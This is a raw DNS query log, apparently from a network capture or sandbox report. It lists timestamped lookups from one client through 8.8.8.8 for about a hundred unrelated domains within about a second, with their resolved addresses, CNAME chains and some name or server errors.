                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.444555044 CET8.8.8.8192.168.2.50xe023No error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.444555044 CET8.8.8.8192.168.2.50xe023No error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.450820923 CET8.8.8.8192.168.2.50x8daNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.451971054 CET8.8.8.8192.168.2.50x7084Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.453974962 CET8.8.8.8192.168.2.50xf358No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.459598064 CET8.8.8.8192.168.2.50x66cdNo error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.461133003 CET8.8.8.8192.168.2.50xa6daNo error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.461133003 CET8.8.8.8192.168.2.50xa6daNo error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.477931023 CET8.8.8.8192.168.2.50x5466No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.481714964 CET8.8.8.8192.168.2.50x86dNo error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.493643999 CET8.8.8.8192.168.2.50x91adNo error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.498682022 CET8.8.8.8192.168.2.50xf2b2No error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.498682022 CET8.8.8.8192.168.2.50xf2b2No error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.499800920 CET8.8.8.8192.168.2.50x3a69No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.503199100 CET8.8.8.8192.168.2.50xfe12No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.504739046 CET8.8.8.8192.168.2.50xbfc8No error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.504739046 CET8.8.8.8192.168.2.50xbfc8No error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.505045891 CET8.8.8.8192.168.2.50x6e95No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.505045891 CET8.8.8.8192.168.2.50x6e95No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.505484104 CET8.8.8.8192.168.2.50xdc19No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.505558968 CET8.8.8.8192.168.2.50x265eNo error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.506994009 CET8.8.8.8192.168.2.50xb4f6No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.506994009 CET8.8.8.8192.168.2.50xb4f6No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.506994009 CET8.8.8.8192.168.2.50xb4f6No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.506994009 CET8.8.8.8192.168.2.50xb4f6No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.507366896 CET8.8.8.8192.168.2.50x5182No error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.513278961 CET8.8.8.8192.168.2.50x986dNo error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.513603926 CET8.8.8.8192.168.2.50xb475No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.515314102 CET8.8.8.8192.168.2.50xb53cName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.525011063 CET8.8.8.8192.168.2.50xcffaNo error (0)workplus.hu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.525011063 CET8.8.8.8192.168.2.50xcffaNo error (0)workplus.hu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.531585932 CET8.8.8.8192.168.2.50x8de1No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.531599998 CET8.8.8.8192.168.2.50xe5cbNo error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.532548904 CET8.8.8.8192.168.2.50xea72No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.532548904 CET8.8.8.8192.168.2.50xea72No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.532548904 CET8.8.8.8192.168.2.50xea72No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.532548904 CET8.8.8.8192.168.2.50xea72No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.533720016 CET8.8.8.8192.168.2.50xa4e5No error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.533744097 CET8.8.8.8192.168.2.50xe385No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.534465075 CET8.8.8.8192.168.2.50xdc6No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.534465075 CET8.8.8.8192.168.2.50xdc6No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.543186903 CET8.8.8.8192.168.2.50xd05eNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.545146942 CET8.8.8.8192.168.2.50xbde9No error (0)onzcda.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.545146942 CET8.8.8.8192.168.2.50xbde9No error (0)onzcda.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.545598030 CET8.8.8.8192.168.2.50x2dffNo error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.546025991 CET8.8.8.8192.168.2.50x5685Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.557780027 CET8.8.8.8192.168.2.50x401fName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.560328007 CET8.8.8.8192.168.2.50xd255No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.562664986 CET8.8.8.8192.168.2.50x2abdNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.562664986 CET8.8.8.8192.168.2.50x2abdNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.566725016 CET8.8.8.8192.168.2.50xad51No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.566837072 CET8.8.8.8192.168.2.50x2166No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.566837072 CET8.8.8.8192.168.2.50x2166No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.567857027 CET8.8.8.8192.168.2.50x31e2No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.567857027 CET8.8.8.8192.168.2.50x31e2No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.567857027 CET8.8.8.8192.168.2.50x31e2No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.567857027 CET8.8.8.8192.168.2.50x31e2No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.568316936 CET8.8.8.8192.168.2.50xcf1No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.568519115 CET8.8.8.8192.168.2.50x23cfNo error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.568519115 CET8.8.8.8192.168.2.50x23cfNo error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.573954105 CET8.8.8.8192.168.2.50x8db8No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.578185081 CET8.8.8.8192.168.2.50x392fName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.579710007 CET8.8.8.8192.168.2.50xa034No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.581764936 CET8.8.8.8192.168.2.50x8c3bName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.582369089 CET8.8.8.8192.168.2.50x404bNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.582369089 CET8.8.8.8192.168.2.50x404bNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.595175028 CET8.8.8.8192.168.2.50xd558No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.596972942 CET8.8.8.8192.168.2.50xaea9No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.598505974 CET8.8.8.8192.168.2.50x84a1No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.602889061 CET8.8.8.8192.168.2.50x451eNo error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.605007887 CET8.8.8.8192.168.2.50x41a8Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.607345104 CET8.8.8.8192.168.2.50x98d4Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.632517099 CET8.8.8.8192.168.2.50x6ec3Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.637995005 CET8.8.8.8192.168.2.50xcfd5No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.642091036 CET8.8.8.8192.168.2.50x527aNo error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.646084070 CET8.8.8.8192.168.2.50xe9e4No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.647978067 CET8.8.8.8192.168.2.50xb763No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.660188913 CET8.8.8.8192.168.2.50xd6dcNo error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.669332981 CET8.8.8.8192.168.2.50xb8cbNo error (0)geecl.com213.175.217.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.679049969 CET8.8.8.8192.168.2.50x33e3No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.680221081 CET8.8.8.8192.168.2.50xbc28No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.680221081 CET8.8.8.8192.168.2.50xbc28No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.680221081 CET8.8.8.8192.168.2.50xbc28No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.680221081 CET8.8.8.8192.168.2.50xbc28No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.682054996 CET8.8.8.8192.168.2.50x625No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.710875034 CET8.8.8.8192.168.2.50xf140No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.712589979 CET8.8.8.8192.168.2.50x7232No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.745729923 CET8.8.8.8192.168.2.50xc310No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.758244991 CET8.8.8.8192.168.2.50xd5bNo error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.761827946 CET8.8.8.8192.168.2.50xdf02No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.780968904 CET8.8.8.8192.168.2.50x1cNo error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.780968904 CET8.8.8.8192.168.2.50x1cNo error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.784904957 CET8.8.8.8192.168.2.50xeb9bNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.859813929 CET8.8.8.8192.168.2.50x905bNo error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.865663052 CET8.8.8.8192.168.2.50xa915No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.865663052 CET8.8.8.8192.168.2.50xa915No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.873259068 CET8.8.8.8192.168.2.50x3194No error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.884169102 CET8.8.8.8192.168.2.50xc2fbNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.915451050 CET8.8.8.8192.168.2.50x4495No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.917280912 CET8.8.8.8192.168.2.50x29f3No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.921469927 CET8.8.8.8192.168.2.50xa673No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.925915956 CET8.8.8.8192.168.2.50x43b3No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.925915956 CET8.8.8.8192.168.2.50x43b3No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.930356979 CET8.8.8.8192.168.2.50x5548No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.931075096 CET8.8.8.8192.168.2.50x81eeNo error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.948087931 CET8.8.8.8192.168.2.50xfcc9No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.948304892 CET8.8.8.8192.168.2.50xe8a4No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.952666998 CET8.8.8.8192.168.2.50x8f72No error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.952711105 CET8.8.8.8192.168.2.50xd94No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.961025000 CET8.8.8.8192.168.2.50xb04bNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.968422890 CET8.8.8.8192.168.2.50x5c88No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:55.976991892 CET8.8.8.8192.168.2.50x1b9aNo error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.010976076 CET8.8.8.8192.168.2.50x8d80No error (0)anduran.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.010976076 CET8.8.8.8192.168.2.50x8d80No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.010976076 CET8.8.8.8192.168.2.50x8d80No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.010976076 CET8.8.8.8192.168.2.50x8d80No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.017258883 CET8.8.8.8192.168.2.50x3873No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.031596899 CET8.8.8.8192.168.2.50x5a4bNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.039268017 CET8.8.8.8192.168.2.50x2276No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.091238022 CET8.8.8.8192.168.2.50x450eNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.091907978 CET8.8.8.8192.168.2.50x9c24No error (0)rkengg.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.091907978 CET8.8.8.8192.168.2.50x9c24No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.091907978 CET8.8.8.8192.168.2.50x9c24No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.091907978 CET8.8.8.8192.168.2.50x9c24No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.103202105 CET8.8.8.8192.168.2.50x5449No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.103230000 CET8.8.8.8192.168.2.50x24ceNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.105365038 CET8.8.8.8192.168.2.50xa5a4No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.113300085 CET8.8.8.8192.168.2.50xae60No error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.134603977 CET8.8.8.8192.168.2.50x5238No error (0)cjcagent.com157.112.187.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.136140108 CET8.8.8.8192.168.2.50x7abeNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.146083117 CET8.8.8.8192.168.2.50xd390Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.162782907 CET8.8.8.8192.168.2.50xf5d4No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.163737059 CET8.8.8.8192.168.2.50x3d92No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.170484066 CET8.8.8.8192.168.2.50xd879No error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.170484066 CET8.8.8.8192.168.2.50xd879No error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.202274084 CET8.8.8.8192.168.2.50x6e2fNo error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.215688944 CET8.8.8.8192.168.2.50x1253No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.232160091 CET8.8.8.8192.168.2.50xe59fNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.250300884 CET8.8.8.8192.168.2.50x609dNo error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.266062975 CET8.8.8.8192.168.2.50x8e90No error (0)lyto.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.266062975 CET8.8.8.8192.168.2.50x8e90No error (0)lyto.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.286915064 CET8.8.8.8192.168.2.50xab16No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.309729099 CET8.8.8.8192.168.2.50x6f9No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.309729099 CET8.8.8.8192.168.2.50x6f9No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.309729099 CET8.8.8.8192.168.2.50x6f9No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.346677065 CET8.8.8.8192.168.2.50x4154No error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.355360031 CET8.8.8.8192.168.2.50xd868No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.370393991 CET8.8.8.8192.168.2.50x96f5No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.371941090 CET8.8.8.8192.168.2.50x9046No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.405203104 CET8.8.8.8192.168.2.50xad92No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.405709982 CET8.8.8.8192.168.2.50x6096Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.431077003 CET8.8.8.8192.168.2.50xb0efServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.448353052 CET8.8.8.8192.168.2.50x2848No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.448353052 CET8.8.8.8192.168.2.50x2848No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.448353052 CET8.8.8.8192.168.2.50x2848No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.449405909 CET8.8.8.8192.168.2.50xb410Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.454497099 CET8.8.8.8192.168.2.50x1e6aNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
